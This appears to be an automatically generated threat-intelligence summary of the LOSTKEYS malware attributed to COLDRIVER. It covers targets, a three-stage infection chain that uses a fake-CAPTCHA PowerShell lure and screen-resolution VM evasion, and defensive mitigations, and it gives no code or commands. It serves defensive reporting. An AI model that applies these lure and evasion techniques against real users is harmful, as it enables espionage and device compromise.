Full Report
New LOSTKEYS malware has been identified and linked to COLDRIVER by GTIG, stealing files and system data in targeted attacks
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
Attributed to a threat actor linked to the **Russian government**.
Known aliases and associated groups: **COLDRIVER**.
## Activity Summary
COLDRIVER has been observed conducting cyber-attacks during January, March, and April 2025 employing a newly identified piece of malware named LOSTKEYS. This activity marks an evolution from their previous focus on credential phishing to deploying more advanced malware capabilities for direct device compromise.
## Tactics, Techniques & Procedures
- Deploys a novel malware named **LOSTKEYS**.
- Utilizes a complex, **three-stage infection process**.
- **Stage 1:** Tricks users via a fake CAPTCHA on a lure website to paste and run a **PowerShell script**.
- **Stage 2:** Attempts to evade virtual machines by checking the **MD5 hash of the screen resolution**.
- **Stage 3:** Downloads and executes further stages of the attack.
- Historically known for **credential phishing**.
## Targeting
- Sectors: **Diplomats**, **NGOs**, and **intelligence personnel**.
- Geography: **Western** entities (mentioned in context of previous targeting).
- Victims: Specific organizations are not named, but the focus is on high-value targets in governmental and non-governmental organizations.
## Tools & Infrastructure
- Malware families used: **LOSTKEYS**.
- The initial delivery involves a **lure website** displaying a fake CAPTCHA.
- Infrastructure details (C2, IPs) were not fully detailed in the truncated snippet, but the use of PowerShell suggests standard system interaction.
## Implications
COLDRIVER is demonstrating capability evolution, moving beyond simple credential theft to deploying custom, multi-stage malware (LOSTKEYS) designed to bypass initial environmental checks (VM evasion checks). This signifies an increased threat level towards their traditional targets, as direct access compromises negate the security value of strong passwords alone.
## Mitigations
- Implement **continuous monitoring** for compromised credentials.
- Educate users to recognize and avoid lure websites, especially those presenting fake CAPTCHAs requiring script execution.
- Deploy advanced endpoint detection and response (EDR) capable of monitoring PowerShell script execution triggered by user interaction.
- Implement controls to detect abnormal system checks, such as VM evasion techniques targeting screen resolution metadata.